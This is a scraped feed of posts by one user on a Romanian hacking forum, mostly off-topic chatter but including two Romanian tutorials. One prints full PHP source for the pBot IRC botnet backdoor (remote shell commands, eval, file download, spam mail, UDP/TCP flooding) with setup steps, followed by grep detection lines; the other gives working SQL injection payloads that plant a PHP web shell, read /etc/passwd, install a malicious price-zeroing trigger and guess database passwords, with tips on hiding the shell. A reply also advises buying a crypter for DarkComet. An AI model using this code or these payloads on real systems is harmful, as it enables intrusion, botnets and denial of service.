Posted 17 October 2006 - 03:22 PM If you have been using AutoIt for any length of time you will know that it is a great, and powerful scripting language. As with all powerful languages there comes a downside. Virus creation by those that are malicious. AutoIt has no virii installed on your system, and if a script you have created has been marked as a virus, (and you're not malicious) then this is a false positive. They found a set of instructions in an AutoIt EXE out there somewhere, took the general signature of the file, and now all AutoIt EXE's are marked (or most of them). This can be due to several reasons. 1. AutoIt is packed with UPX. UPX is an open source software compression packer. It is used with many virii (to make them smaller). 2. Malicious scripter got the AutoIt script engine recognized as a virus. And I am sure there are more ways your executable could be marked, but that covers the basics. Now I am sure you are wanting to know what you can do to get back up and running without being recognized as a virus. You have to send in a report to the offending AV company alerting them to the false positive they have made. It never hurts to send in your source code along with a compiled exe, to help them realize their mistake. You may have to wait up to 24 hours for them to release an update. The time it takes really depends on the offending AV company. Sursa: Are my AutoIt EXEs really infected? - General Help and Support - AutoIt Forums

June 23, 2012
3 replies

RST vs. Polonic

Wubi replied to a topic in Off-topic

Pai problema e ca nu are deloc "tigla pe casa", ca sa nu o jignesc.

June 23, 2012
165 replies

RST vs. Polonic

Wubi replied to a topic in Off-topic

Nu se duce nimeni s`o mierleasca. Cred.

June 23, 2012
165 replies

TCPIP & Networking Linux 2

Wubi replied to pukamvp's topic in Challenges (CTF)

2. route add default gw 10.0.0.1 3. route 4. (2) 5. (2) ifconfig eth0 down 6. Nu stiu, cred ca 1. 7. (3) 8. 2 si 6 9. (1) netstat -a | grep ftp 10. 2; 4; 5; 6; 11. (4) 12. (4) 13. 32 biti(IPv4); (IPv6 foloseste 128 biti); 14. (1) 15. (2) 16. (2); (1) 17. (1); (3) 18. (3) 19. (1); (3); (4); 20. (5) 21. (4) 22. (1); (2) si cred ca (5) 23. (1); (2); 24. (2) e corect 25. (1); (2); 26. (1); (4); 27. (2) ssh -l u7 19.0.0.1 28. (3), desi nu sunt sigur daca comanda este corecta. scp [[user@]from-host:]source-file [[user@]to-host:][destination-file] 29. cred ca (4).

June 23, 2012
4 replies

RST vs. Polonic

Wubi replied to a topic in Off-topic

Nu ma mira ca e profesoara. A mai aparut in trecut o nebuna de genul in media. http://www.youtube.com/watch?v=wOaxOt-dp28 Poate sunt singurul, dar nu ma mira deloc. Prea multi hapciupalitici care se cred Napoleone ocupa diverse functii, in timp ce oamenii competenti, fie sunt someri, fie au plecat la cules de capsuni, fie au un "secand-job", ziua doctor, noaptea stripper, vorba lu` Badea...

June 23, 2012
165 replies

Card cadou eMag

Wubi replied to poq's topic in Off-topic

Acest card va fi valabil incepand cu data de 03.08.2012

June 22, 2012
5 replies

Un Galaxy S III a luat foc din senin in masina unui utilizator

Wubi replied to giok123's topic in Stiri securitate

Incidente de genul s`au mai raportat in trecut la iPhone 4.

June 22, 2012
8 replies
- foc
- galaxy s3
- (and 2 more)
  Tagged with:
  - foc
  - galaxy s3
  - s iii
  - samsung

Darkcomet FUD

Wubi replied to harceaparcea's topic in Cosul de gunoi

Nu te mai chinui sa cauti pe cineva caruia sa`i oferi bani pentru a`ti crypta. Cine va avea bunavointa sa o faca, o va face gratis. Nu trebuie sa ai incredere in orice bozgor venit pe forum in 2008 cu 10 posturi. Multi in ultima vreme se pare ca au bucuri la 5 10 euro, si o dau in tepe. PS: Daca tot ai bani de aruncat in stanga si`n dreapta, cumpara`ti un crypter.

June 21, 2012
7 replies

RST Encrypter

Wubi replied to DarkyAngel's topic in Programe utile

Mi-ati furat ideea.

June 21, 2012
11 replies

Analiza pBot - PHP IRC bot

Wubi posted a topic in Tutoriale in romana

Pentru amatorii de IRC, nu este un lucru nou sa intalnesti boti de IRC pe underground channels, care au integrate functii precum, port scanning, nmap, SQL Injection Scanners, RFI/LFI scanners, Credit Card Checkers, etc. ce automat imprastie un shell sau multe altele. Acesti boti de IRC, sunt de obicei scrisi in limbaje precum Perl, PHP si Python; si cei mai multi dintre ei sunt disponibili pe pastebin. Am mai zis despre boti care sunt hostati pe root-uri sau website-uri care au backdoor shells. In acest topic, vom arunca o privire peste pBot, un bot de IRC scris in PHP, ce are functii similare cu un backdoor shell, si cu functii stress testing. Pentru cei ce vor sa analizeze script-ul: <? set_time_limit(0); error_reporting(0); class pBot { var $config = array(“server”=>”", “port”=>, “pass”=>”", “prefix”=>”", “maxrand”=>4, “chan”=>”", “key”=>”", “modes”=>”+iB-x”, “password”=>”", “trigger”=>”!”, “hostauth”=>”*” // * for any hostname ); var $users = array(); function start() { if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30))) $this->start(); $ident = “”; $alph = range(“a”,”z”); for($i=0;$i<$this->config['maxrand'];$i++) $ident .= $alph[rand(0,25)]; if(strlen($this->config['pass'])>0) $this->send(“PASS “.$this->config['pass']); $this->send(“USER $ident 127.0.0.1 localhost :$ident”); $this->set_nick(); $this->main(); } function main() { while(!feof($this->conn)) { $this->buf = trim(fgets($this->conn,512)); $cmd = explode(” “,$this->buf); if(substr($this->buf,0,6)==”PING :”) { $this->send(“PONG :”.substr($this->buf,6)); } if(isset($cmd[1]) && $cmd[1] ==”001?) { $this->send(“MODE “.$this->nick.” “.$this->config['modes']); $this->join($this->config['chan'],$this->config['key']); } if(isset($cmd[1]) && $cmd[1]==”433?) { $this->set_nick(); } if($this->buf != $old_buf) { $mcmd = array(); $msg = substr(strstr($this->buf,” :”),2); $msgcmd = explode(” “,$msg); $nick = explode(“!”,$cmd[0]); $vhost = explode(“@”,$nick[1]); $vhost = $vhost[1]; $nick = substr($nick[0],1); $host = $cmd[0]; if($msgcmd[0]==$this->nick) { for($i=0;$i<count($msgcmd);$i++) $mcmd[$i] = $msgcmd[$i+1]; } else { for($i=0;$i<count($msgcmd);$i++) $mcmd[$i] = $msgcmd[$i]; } if(count($cmd)>2) { switch($cmd[1]) { case “QUIT”: if($this->is_logged_in($host)) { $this->log_out($host); } break; case “PART”: if($this->is_logged_in($host)) { $this->log_out($host); } break; case “PRIVMSG”: if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == “*”)) { if(substr($mcmd[0],0,1)==”.”) { switch(substr($mcmd[0],1)) { case “user”: if($mcmd[1]==$this->config['password']) { $this->privmsg($this->config['chan'],”[\2auth\2]: $nick logged in”); $this->log_in($host); } else { $this->privmsg($this->config['chan'],”[\2auth\2]: Incorrect password from $nick”); } break; } } } elseif($this->is_logged_in($host)) { if(substr($mcmd[0],0,1)==”.”) { switch(substr($mcmd[0],1)) { case “restart”: $this->send(“QUIT :restart”); fclose($this->conn); $this->start(); break; case “mail”: //mail to from subject message if(count($mcmd)>4) { $header = “From: <”.$mcmd[2].”>”; if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header)) { $this->privmsg($this->config['chan'],”[\2mail\2]: Unable to send”); } else { $this->privmsg($this->config['chan'],”[\2mail\2]: Message sent to \2?.$mcmd[1].”\2?); } } break; case “dns”: if(isset($mcmd[1])) { $ip = explode(“.”,$mcmd[1]); if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3])) { $this->privmsg($this->config['chan'],”[\2dns\2]: “.$mcmd[1].” => “.gethostbyaddr($mcmd[1])); } else { $this->privmsg($this->config['chan'],”[\2dns\2]: “.$mcmd[1].” => “.gethostbyname($mcmd[1])); } } break; case “info”: $this->privmsg($this->config['chan'],”[\2info\2]: [\2httpd\2: ".$_SERVER['SERVER_SOFTWARE'].”] [\2docroot\2: ".$_SERVER['DOCUMENT_ROOT'].”] [\2domain\2: ".$_SERVER['SERVER_NAME'].”] [\2admin\2: ".$_SERVER['SERVER_ADMIN'].”] [\2url\2:".$_SERVER['REQUEST_URI'].”]”); break; case “cmd”: if(isset($mcmd[1])) { $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1); $this->privmsg($this->config['chan'],”[\2cmd\2]: $command”); $pipe = popen($command,”r”); while(!feof($pipe)) { $pbuf = trim(fgets($pipe,512)); if($pbuf != NULL) $this->privmsg($this->config['chan'],” : $pbuf”); } pclose($pipe); } break; case “rndnick”: $this->set_nick(); break; case “raw”: $this->send(strstr($msg,$mcmd[1])); break; case “php”: $eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1]))); break; case “exec”: $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1); $exec = shell_exec($command); $ret = explode(“\n”,$exec); $this->privmsg($this->config['chan'],”[\2exec\2]: $command”); for($i=0;$i<count($ret);$i++) if($ret[$i]!=NULL) $this->privmsg($this->config['chan'],” : “.trim($ret[$i])); break; case “pscan”: // .pscan 127.0.0.1 6667 if(count($mcmd) > 2) { if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15)) $this->privmsg($this->config['chan'],”[\2pscan\2]: “.$mcmd[1].”:”.$mcmd[2].” is \2open\2?); else $this->privmsg($this->config['chan'],”[\2pscan\2]: “.$mcmd[1].”:”.$mcmd[2].” is \2closed\2?); } break; case “ud.server”: // .udserver <server> <port> [password] if(count($mcmd)>2) { $this->config['server'] = $mcmd[1]; $this->config['port'] = $mcmd[2]; if(isset($mcmcd[3])) { $this->config['pass'] = $mcmd[3]; $this->privmsg($this->config['chan'],”[\2update\2]: Changed server to “.$mcmd[1].”:”.$mcmd[2].” Pass: “.$mcmd[3]); } else { $this->privmsg($this->config['chan'],”[\2update\2]: Changed server to “.$mcmd[1].”:”.$mcmd[2]); } } break; case “download”: if(count($mcmd) > 2) { if(!$fp = fopen($mcmd[2],”w”)) { $this->privmsg($this->config['chan'],”[\2download\2]: Cannot download, permission denied.”); } else { if(!$get = file($mcmd[1])) { $this->privmsg($this->config['chan'],”[\2download\2]: Unable to download from \2?.$mcmd[1].”\2?); } else { for($i=0;$i<=count($get);$i++) { fwrite($fp,$get[$i]); } $this->privmsg($this->config['chan'],”[\2download\2]: File \2?.$mcmd[1].”\2 downloaded to \2?.$mcmd[2].”\2?); } fclose($fp); } } break; case “die”: $this->send(“QUIT :die command from $nick”); fclose($this->conn); exit; case “logout”: $this->log_out($host); $this->privmsg($this->config['chan'],”[\2auth\2]: $nick logged out”); break; case “udpflood”: if(count($mcmd)>4) { $this->udpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4]); } break; case “tcpflood”: if(count($mcmd)>5) { $this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]); } break; } } } break; } } } $old_buf = $this->buf; } $this->start(); } function send($msg) { fwrite($this->conn,”$msg\r\n”); } function join($chan,$key=NULL) { $this->send(“JOIN $chan $key”); } function privmsg($to,$msg) { $this->send(“PRIVMSG $to :$msg”); } function is_logged_in($host) { if(isset($this->users[$host])) return 1; else return 0; } function log_in($host) { $this->users[$host] = true; } function log_out($host) { unset($this->users[$host]); } function set_nick() { if(isset($_SERVER['SERVER_SOFTWARE'])) { if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),”apache”)) $this->nick = “[A]“; elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),”iis”)) $this->nick = “[I]“; elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),”xitami”)) $this->nick = “[X]“; else $this->nick = “[U]“; } else { $this->nick = “[C]“; } $this->nick .= $this->config['prefix']; for($i=0;$i<$this->config['maxrand'];$i++) $this->nick .= mt_rand(0,9); $this->send(“NICK “.$this->nick); } function udpflood($host,$packets,$packetsize,$delay) { $this->privmsg($this->config['chan'],”[\2udpflood\2]: Sending $packets packets to $host. Packet size: $packetsize”); $packet = “”; for($i=0;$i<$packetsize;$i++) $packet .= chr(mt_rand(1,256)); for($i=0;$i<$packets;$i++) { if(!$fp=fsockopen(“udp://”.$host,mt_rand(0,6000),$e,$s,5)) { $this->privmsg($this->config['chan'],”[\2udpflood\2]: Error: <$e>”); return 0; } else { fwrite($fp,$packet); fclose($fp); } sleep($delay); } $this->privmsg($this->config['chan'],”[\2udpflood\2]: Finished sending $packets packets to $host.”); } function tcpflood($host,$packets,$packetsize,$port,$delay) { $this->privmsg($this->config['chan'],”[\2tcpflood\2]: Sending $packets packets to $host:$port. Packet size: $packetsize”); $packet = “”; for($i=0;$i<$packetsize;$i++) $packet .= chr(mt_rand(1,256)); for($i=0;$i<$packets;$i++) { if(!$fp=fsockopen(“tcp://”.$host,$port,$e,$s,5)) { $this->privmsg($this->config['chan'],”[\2tcpflood\2]: Error: <$e>”); return 0; } else { fwrite($fp,$packet); fclose($fp); } sleep($delay); } $this->privmsg($this->config['chan'],”[\2tcpflood\2]: Finished sending $packets packets to $host:$port.”); } } $bot = new pBot; $bot->start(); ?> Nu voi sta sa explic codul linie cu linie, dar voi enumera cateva dintre functiile si comenzile acestui PHP IRC bot bazat pe urmatorul cod. Dupa cum spuneam, script-ul care l`am aratat nu este configurat sa se conecteze la IRC, deci primul lucru pe care il avem de facut este sa punem serverul IRC, name, password, port si channel unde IRC bot ar trebui sa se conecteze. Mai jos un exemplu simplu de configurare: var $config = array("server"=>"irc.freenode.net", // IRC server "port"=>6667, //port (the default port for connecting to IRC is 6667) "pass"=>"", // password of the channel if there is any "prefix"=>"infosecinstibot|", //nickname of the bot "chan"=>"#rootcon", //channel "password"=>"shipcode", //password for activating the bot using the command : .user <password> Dupa ce ai configurat conexiunea, putem rula script-ul scriind urmatoarea comanda in terminal: php filenameofthebot.php Multi nu vor vrea sa`si lase script-ul, deci doar vor executa IRC bot fara a`l salva pe web server, punand intregul scrip in eval PHP, printr-un backdoor shell. Ok, acum bot-ul este conectat la canalul de IRC. Mai jos sunt comenzile pe care le poti incerca pe acest script: .user <password> = Folosit pentru a te conecta la bot. <password> este cea pe care ai folosit`o la configurare “password”=>”". .logout = Pentru a te deconecta de la bot .die = Omoara procesul bot-ului si opreste conexiunea bot-ului catre serverul IRC. .restart = Restarteaza bot-ul. .mail <to> <from> <subject> <msg> = Pentru a trimite mail-uri folosind if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header)). Acesta poate fi folosit pentru spamming, deoarece il poti folosi pentru a crea email-uri non-existente pentru argumentul <from>. .dns = Face o cautare DNS. .download <URL> <filename> = Ii permite user-ului sa descarce un fisier si sa`l redenumeasca dupa URL-ul adaugat. .exec <command> = Executa o comanda folosind functia exec(). .cmd <command> = Executa o comanda folosind functia popen(). .info = Ia informatii despre sistem. .php <php code> = Executa un cod php folosind functia eval(). .tcpflood <target> <packets> <packetsize> <port> <delay> = Executa un atac tcpflood bazat pe functia tcpflood($host,$packets,$packetsize,$port,$delay). .udpflood <target> <packets> <packetsize> <delay> = Executa un atac Udpflood. .rndnick = Schimba numele bot-ului. .pscan <host> <port> = Scaneaza un anume port de pe host. .safe = Testeaza safe_mode. .inbox <to> = Testeaza inbox-ul. .conback <ip> <port> = Conecteaza back-function. Bazandu`se pe comenzile enumerate, PHP IRC bot este foarte periculos, deoarece este inca considerat un backdoor deoarece ii permite atacatorului sau user-ului sa utilizeze comenzi. De asemenea, poate porni atacuri DoS prin functiile tcpflood si udpflood. Cum sa detectezi sau sa scapi de acest PHP IRC Bot Precum am scapa de fisiere PHP suspicioase sau de backdoor shells, putem localiza PHP IRC bot folosind comanda grep in terminal, atata timp cat ai acces la serverul web. Nu va fi foarte usor deoarece are multe functii in codul php. Cel mai simplu, vom folosi functia care majoritatea IRC bots o folosesc. Deoarece pBot are functii malitioase, cum ar fi udpflood si tcpflood, vom putea folosi aceste functii pentru a localiza script-ul cu usurinta. Ex: grep -Rn "tcpflood *(" /var/www grep -Rn "udpflood *(" /var/www Si precum oricare backdoor shell, foloseste functia shell_exec deci vei vrea sa "grep-uiesti" functia asta de asemenea. Pentru a lista toate cele 3 functii intr`o singura comanda grep: grep -RPn "(shell_exec|tcpflood|udpflood) *\(" /var/www/ Dupa ce esti sigur ca acel cod este pBot, urmatorul lucru pe care ar trebui sa`l faci este sa`l stergi si sa restartezi serverul. Referinte: pastebin.com Sursa

June 21, 2012
7 replies
- pbot php irc bot

Proxy HackForums

Wubi replied to flux's topic in Programe utile

Eu folosesc Anonymouse(Anonymouse.org) si se misca relativ repede.

June 20, 2012
7 replies

Cine ma ajuta sa ma ridic si eu cu forumu

Wubi replied to bumbleebe's topic in Linkuri

Ti`as da sute de motive pentru care n`o sa ai success in veci cu forum-ul ala, si as putea face caterinca pe tema asta ore`n sir. Insa, daca vrei sa faci ceva, mai mult sau mai putin de succes, fa`ti un vBulletin, pe un freehosting daca nu dispui momentan de banii necesari pentru un hosting. Dar macar strange o alocatie si cumpara`ti un domeniu(preferabil un nume frumos, atractiv, nu "hackmetin2.com"). Gandeste`te la niste categorii calumea nu "Hacks Metin2". Trebuie sa ai chestii interesante, noi, chestii de actualitate, care sa atraga lumea. Daca forumul tau vrei sa fie despre 'hacking', fa nesimtirea si inspira`te de aici, dar nu sa copiezi tot cap coada. Apoi foloseste o tema, interesanta, nu cu icons de la "Cantar Straik". Pune`te pe scris niste Tutoriale, posteaza Stiri despre chestii interesante. Poti sa folosesti MagicSubmitter(postat de ElChief parca) pentru a`ti indexa forumul. Cand consideri ca ai destul de mult continut, fa`ti un cont AdSense(cel mai bine intai le citesti politica). Poate ca nu am venit cu cele mai bune metode pentru un forum de succes, insa in comparatie cu forumul tau actual...

June 20, 2012
15 replies

PS pastebin

Wubi replied to a topic in Programe utile

Aceiasi problema o am si eu, din cauza la HCStealer. L`am avut putin timp, nici cateva ore pe site, dar a fost de`ajuns sa`l detecteze nod-ul cuiva si cred ca l`a bagat in urmatorul virus signature database.

June 20, 2012
22 replies

Crearea Backdoor-urilor folosind SQL Injection

Wubi replied to Wubi's topic in Tutoriale in romana

Voi adauga mai multe informatii legat de asta. Multumesc de sugestie.

Salut RST

Wubi replied to adela95's topic in Bine ai venit

Bun venit Adela! Sa arunci un ochi si peste regulament. Multi omit lucrul asta, si sfarsesc tragic.

June 18, 2012
8 replies

Crearea Backdoor-urilor folosind SQL Injection

Wubi posted a topic in Tutoriale in romana

Introducere Daca citesti articolul atunci sunt destul de sigur ca ai auzit de un virus, altfel numit Trojan horse sau worm, care iti poate infecta sistemul. Odata infectat, sistemul tau ar putea infecta altele, de asemenea, cum ar fi: atunci cand te conectezi la o retea cu sistemul infectat. De multe ori, malware-ul, pe langa faptul ca se raspandeste catre alte sisteme, dar schimba cate ceva la fiecare. Aceste schimbari, vor lasa virusul sa controleze de la distanta, fiecare sistem infectat, mai devreme sau mai tarziu. In acest articol vom gasi cateva moduri in care diferite tipuri de backdoor-uri pot fi introduse intr-un server prin intermediul vulnerabilitatilor SQL Injection. Vom lua spre exemplu o aplicatie pe care o am si este deja vulnerabila pt SQL Injection, si voi utiliza o vulnerabilitate existenta pt a introduce backdoor-ul in sistem. Ce este SQL Injection? Deja sunt peste un milion de articole despre SQL Injection, si cum poate fi descoperit si folosit, asa ca nu ma voi repeta. Aici este un link, catre un articol introductiv, daca ai nevoie de informatii in plus despre SQL Injections. Articolul include de asemenea un nr de referinte unde poti gasi informatii suplimentare pe baza acestui subiect. Ma rog, acum ca ti`ai clarificat cunostiintele despre SQL Injection si cum sa extragi datele din baza de date. Acum vom folosi aceasta vulnerabilitate descoperita, pentru a crea un backdoor in sistem. (OS) Backdoor... Ceea ce vrem este sa putem sa executam comenzi la intamplare impotriva sistemului de operare exploatand vulnerabilitatile SQL Injection. Pentru a executa comenzi sistemului de operare, vom avea nevoie de o comanda (CMD) shell, sau vom fi nevoiti sa rulam codul care ne permite sa exeutam comenzi pe OS. Sa incercam ambele tehnici. Obtinerea unui OS Shell Acum vom incerca sa scriem propriul nostru cod in server care ne va ajuta sa executam corect comenzile OS impotriva serverului. Asa cum deja stim, din articoul precedent, ca parametrul de cautare este vulnerabil catre SQL Injection, si ca sunt puse la mijloc 4 coloane. Ca a ne reaminti, un input al Harry Potter’ union select 1,2,3,4# ne da o eroare. Acum amintesteti, vrem sa inseram propriul cod PHP astfel incat sa executam comenzile shell. Pentru a face asta folosim optiunea INTO OUTFILE. Folosind INTO OUTFILE este posibil ca output-ul unui query, sa fie redirectionat intr-un document al sistemului de operare. Asa ca, daca folosinm ca input - Harry Potter’ union select ‘TEXT INTO FILE’,2,3 INTO OUTFILE ‘/tmp/blah.txt’#, secventa ‘TEXT INTO FILE’ va fi memorata in fisierul blah.TXT in directorul /tmp. Acum in loc de 'TEXT INTO FILE', vom folosi cateva coduri PHP de baza, ce va citi si rula o comanda din URL, pe sistemul de operare, folosind-ul ca input. Aici este input-ul pe care il vom folosi: Harry Potter’ union select “<? system($_REQUEST['cmd']); ?>”,2,3 INTO OUTFILE ‘/var/www/test/execcmd.php’# Deci voi modifica query-ul, si voi renunta la Harry Potter, in loc de asta, voi folosi - ‘ union select “<? system($_REQUEST['cmd']); ?>”,2,3 INTO OUTFILE ‘/var/www/test/execcmd.php’# si voi rula din nou... Asta este mult mai bine, chiar daca inca mai apar 2 si 3. Sa incercam sa accesam pagina execcmd.php, si sa trecem comanda [cat /etc/passwd] pe care vrem sa o executam ca un argument. A mers. Mai sunt cateva lucruri de amintit aici, pe care le`am descoperit in timp ce incercam toate astea. -- User-ul database care ruleaza aceste query-uri impotriva bazei de date trebuie sa aibe FILE privilege, altefel nu poate utiliza comanda INTO OUTFILE. -- Aici ar trebui sa fie un director in webroot, in care utilizatorul serviciului MySQL poate scrie; altfel nu poti accesa web shell-ul pe care l`ai incarcat; poti scrie asta intr-un director world writeable, cum ar fi /tmp, dar atunci nu l`ai putea accesa. Cea mai usoara cale sa o faci, sa incerci sa iei un shell, este sa folosesti un inbuilt SQLMap. Daca citesti articolul(InfoSec Resources – Blind SQL Injection 1.0 – Attack Anatomy), iti vei aminti ca am folosit SQLMap. Hai sa folosim acelasi cod din nou pentru a demontra optiunea SQLMap. Mai jos este un screenshot al OS shell obtinut adaugand o simpla optiune a SQLMap, apoi selectand un PHP Web shell. Ruleaza o comanda doar pentru a verifica daca chiar este un shell. Si da, este. Din pacate, asta este cam cat de usoare sunt lucrurile cateodata din perspectiva "baietilor rai". Acum, probabil ca nu vrei sa folosesti tehnica anterioara, deoarece aceasta este mai usoara si mai rapida, dar intotdeauna ajuta sa cunosti metoda manuala( vei avea nevoie de ajutor daca tool-urile esueaza ). Inca un lucru de retinut, dupa ce Web shell-ul este creat, foloseste un nume care este similar cu numele fisierelor care deja exista in webroot. Aceasta te va proteja in a fi usor descoperit. Inainte sa trecem la urmatorul tip de backdoor, vreau sa iti arat ce SQLMap tine "sub capota". Poti rula SQLMap cum un set de proxy-uri pentru a face asta. Inainteaza cateva solicitari pana cand Web shell-ul este gata urcat folosind SQLMap pe un director world writeable, si uita`te la query-ul care actioneaza impotriva bazei de date. Hmm...ar trebui sa vedem ceva similar. Vom decoda URL-ul pentru a fi siguri. Uita-te la partea albastra evidentiata in josul paginii. Reiese ca SQLMap utilizeaza comanda INTO OUTFILE; aceeasi comanda pe care am utilizat-o mai devreme cand invatam tehnica manuala. In sfarsit, sa ne uitam la continutul Web Shell-ului pe care SQLMap il upload-eaza. E mult mai atractiv. Uita-te la panoul de jos. Ceea ce e important aici, inca o data, este ca unealta ne simplifica semnificativ munca, dar face acelasi lucru (in mare) pe care il faceam daca ne permiteam luxul unui timp nelimitat . Un backdoor database... Deci acum stim ca un backdoor poate fi plantat pe un sistem daca aplicatia este vulnerabil la SQL Injection. Acum, la fel de bine, sa vedem cum un backdoor poate fi plantat in baza de date. Inainte de a incepe totusi, avem nevoie de putine informatii despre cum functioneaza un backdoor. In backdoor-ul OS-ului, am accesat directi backdoor-ul si i-am trecut comanda; aici e putin mai indirect. Backdoor-ul pe care il configuram va schimba valorile datelor sensibile din baza de date de fiecare data cand operatiunea Insert este selectata. Deci, de fiecare data cand o noua carte este atasata bazei de date backdoor-ul nostru ii va seta pretul la 0, asa incat oamenii pot cumpara carti fara a plati pentru ele. Acest lucru va fi detectat destul de rapid in lumea reala totusi. Deci avem ceva numit "mecanism de declansare" in baza de date; asta inseamna de fapt - "Atunci cand ceva ce vreau sa se fi intamplat se intampla, apasa pe tragaci si fa altceva". Asta e de fapt prea vag. Deci, sa luam un exemplu putin mai sensibil. Sa zicem ca esti un politist. In momentul in care vezi un criminal in serie, apesi pe tragaci (mecanismul de declansare) si glontul este eliberat. Corect? Deci, revenind - aici este un INSERT(criminalul), baza de date (tragaciul) este apasat si actiunea pe care ai configurat-o (glontul) are loc. Aici este trigger-ul MySQL pe care il vom scrie. delimiter # CREATE TRIGGER price BEFORE INSERT ON books for each row begin set new.price='0'; end;# delimiter ; Si asta este ce inseamna... a) Setam delimitatorul MySQL ca "#". Asta e deoarece delimitatorul implicit este a ; si e tratata ca un caracter special in MySQL. Oricum, avem de nevoie ca aceasta sa fie tratata ca data. Deci noi schimbam delimitatorul intr-un "#"; ceea ce inseamna ca "#" are acum un sens special. Ori de cate ori va fi un insert, adica ori de cate ori se adauga o noua carte, seteaza pretul acelei carti in 0. c) Termina trigger-ul si seteaza delimitatorul inapoi in a ; Codul pentru acel trigger are nevoie sa ruleze cumva. Deci noi avem nevoie cumva sa punem codul pe server. Sa folosim vulnerabilitatea SQL Injection pe care o stim despre prima copie a trigger-ului pe server. Asta este input-ul pe care noi il vom folosi pe Search box. Harry Potter’ AND 1=0 union select 0×20,0×20,0×20 INTO OUTFILE ‘/var/www/test/g2? LINES TERMINATED BY 0x64656c696d6974657220230a4352454154452054524947474552207072696365204245464 f524520494e53455254204f4e20626f6f6b730a666f72206561636820726f7720626567696e0a7 36574206e65772e70726963653d2730273b0a656e643b230a64656c696d69746572203b# Voi da o scurta explicatie a acestul query - deoarece deja pare a fi complex - desi in realitate nu este. Folosim un 1=0 deoarece nu suntem interesati de rezultatele query-ului Harry Potter. 0x20 este doar caracterul 'space' de trei ori; asta este doar pentru a face rost de lucrurile de care avem nevoie (syntaxa valida a trigger-ului) in fisierul 'var/www/test/g2'. Ce urmeaza dupa LINES TERMINATED BY este intregul trigger in hex. Deci, sa`l rulam acum si sa vedem ce apare in fisierul /var/www/test/g2. Ai observat spatiile de la inceput? Este deoarece am selectat 0x20,0x20,0x20 dupa cum s`a vazut. Restul se intelege de la sine. Acum noi cumva trebuie sa executam acest query, deci trigger-ul este activat de fiecare data cand o carte este 'INSERTed'. Aici sunt 3 moduri in care asta poate fi realizata: 1)Stacked queries - Harry Potter’ UNION blah blah blah; source /var/www/test/g2 Asta oricum nu merge deoarece stacked queries nu sunt suportate pe PHP-MySQL Abuzand trigger-ul implicit MySQL Aceasta este o tehnica in care nu am avut incredere, dar care este documentata foarte clar de Stefano Di Paola. O poti incerca; Voi face la fel uneori. c) Utilizand un tool pentru SQL injection ca SQLMap pentru a rula trigger-ul salvat in fisierul /var/www/tst/g2 Aceasta este metoda pe care o vom testa Deci sa rulam SQLMap din nou pentru a obtine un SQL shell unde putem incerca trigger-ul. Uita`te la ultima linie. Din pacate, singura cale sa facem asta sa mearga este atunci cand stacked query este disponibil. Asta inseamna ca optiunile a si c de mai sus se refera la acelasi lucru. Sa confirmam asta uitandu`ne la proxy-ul SQLMap. Sa executam un simplu query care va crea o noua baza de date. - ‘create database boo;’ in sql-shell si ne uitam dupa Burp. Dupa cum putem vedea, incearca sa o interpreteze ca un query selectat. Asta nu va merge niciodata. Raspunsul de la Burp confirma asta. Singura cale la care ma pot gandi, in scopul de a rula query-ul nostru presupune uratoarele etape: -- Ghicim parola de la MySQL database pentru un user valid. De exemplu, ai ghicit root si test123 -- Injecteaza un OS web shell backdoor (ca mai devreme) -- Acum ruleaza trigger-ul folosind comanda MySQL de pe Web shell si instaleaza trigger-ul. Am inclus cateva screenshot-uri despre cum poate asta sa functioneze. Pentru inceput...aici este un screenshot ce arata ca nu e niciun trigger in database. Sa presupunem ca deja am ghicit username-ul si parola ca fiind root si toor [brute force]. Acum putem accesa Web shell-ul si sa punem urmatoarea comanda: mysql -u<USERNAME> -p<PASSWORD> <DB NAME> < /var/www/test/g2 Acum sa ne uitam la database din nou. Acolo este trigger-ul nostru. Acum sa executam un INSERT query, si sa vedem daca trigger-ul nostru "ruleaza". Acum in query-ul ce ruleaza...... Uita`te la ultima linie. Cineva nu va fi platit atat cat a crezut ca va fi... Acum acolo noi executam direct un INSERT query, inpotriva database. In lumea reala, acolo ar trebui sa fie un formular la "Add Books" ce ar putea avea acest exact INSERT query in backend, si trigger-ul ar trebui mai mult ca sigur inca sa ruleze. Asta este singurul motiv pentru care nu am creat un nou formular(si sunt prea lenes sa fac asta). Evident marele DACA in acest atac este ca vom fi nevoiti sa ghicim username-ul si parola pentru baza de date. Fara a intra prea mult in detalii, aici este un mod de abordare: -- Gandeste-te la cateva database usernames cunoscute [ex: root in cazul in care este MySQL] sau Social Engineering pentru a face rost de ele. -- MySQL passwords sunt hashed in zilele noastre; deci parola nu va fi "clear text" -- Poti incerca sa crack-ezi parolele in 2 moduri (la care m`am putut gandi): * Foloseste vulnerabilitatea SQL injection sa compari listele de parole comparativ cu parolele stocate. (Blind SQL) * Executa trigger-ul in Web shell cu intreaga lista a parolelor cleartext pentru un account specific(Poti scrie un script in Perl sau Ruby care sa faca asta pentru tine). Incearca sa inserezi o carte dupa ce toata lista de parole a fost vazuta sau dupa fiecare incercare de a ghici parola pentru a-ti da seama care a mers. * mysql -uroot -ptoor blindsql_test< /var/www/test/g2 * mysql -uroot -proot blindsql_test< /var/www/test/g2 * mysql -uroot -ptest blindsql_test< /var/www/test/g2 * mysql -uroot -ppassword blindsql_test< /var/www/test/g2 Recomandari: * Foloseste queri-uri parametrizate pentru a te proteja inpotriva SQL injection * Asigura-te ca nu ai niciun director "world writeable" in webroot. * Restrictioneaza privilegiile userului aplicatiei, care iti interogheaza baza de date. In acest caz, nu lasa fisierul in mainile acelui user. * Scapa de toate accounturile implicite ale bazei de date * Foloseste parola puternice si o politica a parolelor puternica Concluzie Radacina problemei ramane, aplicatia e 